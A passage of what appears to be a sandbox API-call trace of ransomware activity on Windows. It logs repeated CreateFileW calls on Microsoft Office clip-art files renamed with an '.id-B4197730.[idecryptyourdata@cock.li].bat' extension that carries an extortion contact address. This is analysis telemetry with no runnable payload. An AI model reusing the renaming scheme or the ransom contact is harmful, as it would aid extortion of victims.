dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.231] CloseHandle (hObject=0x37c) returned 1 [0174.232] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.232] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.232] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02431_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02431_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.233] CloseHandle (hObject=0x37c) returned 1 [0174.234] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.234] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.234] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02437_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02437_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.234] CloseHandle (hObject=0x37c) returned 1 [0174.654] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.654] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.654] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00241_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn00241_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.654] CloseHandle (hObject=0x530) returned 1 [0174.655] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.655] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.655] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00246_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn00246_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.655] CloseHandle (hObject=0x530) returned 1 [0174.656] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.656] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.656] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00253_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn00253_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.656] CloseHandle (hObject=0x530) returned 1 [0174.657] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.657] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.657] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00255_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn00255_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.657] CloseHandle (hObject=0x530) returned 1 [0174.658] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.658] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.658] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00330_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn00330_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.659] CloseHandle (hObject=0x530) returned 1 [0174.660] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.660] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.661] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00411_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn00411_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.661] CloseHandle (hObject=0x530) returned 1 [0174.662] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.662] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.662] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00687_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn00687_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.662] CloseHandle (hObject=0x530) returned 1 [0174.663] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.663] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.663] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN01164_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn01164_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.663] CloseHandle (hObject=0x530) returned 1 [0174.664] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.664] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.664] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN01165_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn01165_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.665] CloseHandle (hObject=0x530) returned 1 [0174.665] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.665] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.665] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN01308_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn01308_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.666] CloseHandle (hObject=0x530) returned 1 [0174.667] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.667] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.668] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TR00006_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tr00006_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.668] CloseHandle (hObject=0x530) returned 1 [0174.670] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.670] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.670] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TR00095_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tr00095_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.671] CloseHandle (hObject=0x530) returned 1 [0174.672] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.672] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.672] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TR00097_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tr00097_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.672] CloseHandle (hObject=0x530) returned 1 [0174.673] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.673] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.673] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TR00116_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tr00116_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.674] CloseHandle (hObject=0x530) returned 1 [0174.674] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.675] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.675] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TR00126_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tr00126_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.675] CloseHandle (hObject=0x530) returned 1 [0174.676] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.676] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.676] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TR00172_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tr00172_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.676] CloseHandle (hObject=0x530) returned 1 [0174.677] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.677] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.678] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TR00178_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tr00178_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.678] CloseHandle (hObject=0x530) returned 1 [0174.680] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.680] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.680] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TR00232_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tr00232_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.680] CloseHandle (hObject=0x530) returned 1 [0174.681] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.681] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.682] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TR00233_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tr00233_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.682] CloseHandle (hObject=0x530) returned 1 [0174.683] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.683] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.683] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TR00402_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tr00402_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.683] CloseHandle (hObject=0x530) returned 1 [0174.684] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.684] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.684] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TR00482_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tr00482_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.685] CloseHandle (hObject=0x530) returned 1 [0174.686] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.686] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.686] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TR00494_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tr00494_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.687] CloseHandle (hObject=0x530) returned 1 [0174.688] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.688] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.688] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01219_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01219_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.688] CloseHandle (hObject=0x530) returned 1 [0174.689] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.689] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0175.011] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01237_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01237_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.011] CloseHandle (hObject=0x530) returned 1 [0175.012] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0175.012] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0175.013] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB02082_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb02082_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.013] CloseHandle (hObject=0x530) returned 1 [0175.013] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0175.014] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0175.014] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB02085_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb02085_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.014] CloseHandle (hObject=0x530) returned 1 [0175.015] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0175.015] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0175.015] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB02097_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb02097_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.016] CloseHandle (hObject=0x530) returned 1 [0175.018] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0175.018] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0175.018] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB02106_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb02106_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.018] CloseHandle (hObject=0x530) returned 1 [0175.019] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0175.019] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0175.019] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB02116_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb02116_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.019] CloseHandle (hObject=0x530) returned 1 [0175.020] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0175.020] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0175.020] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB02134_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb02134_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, 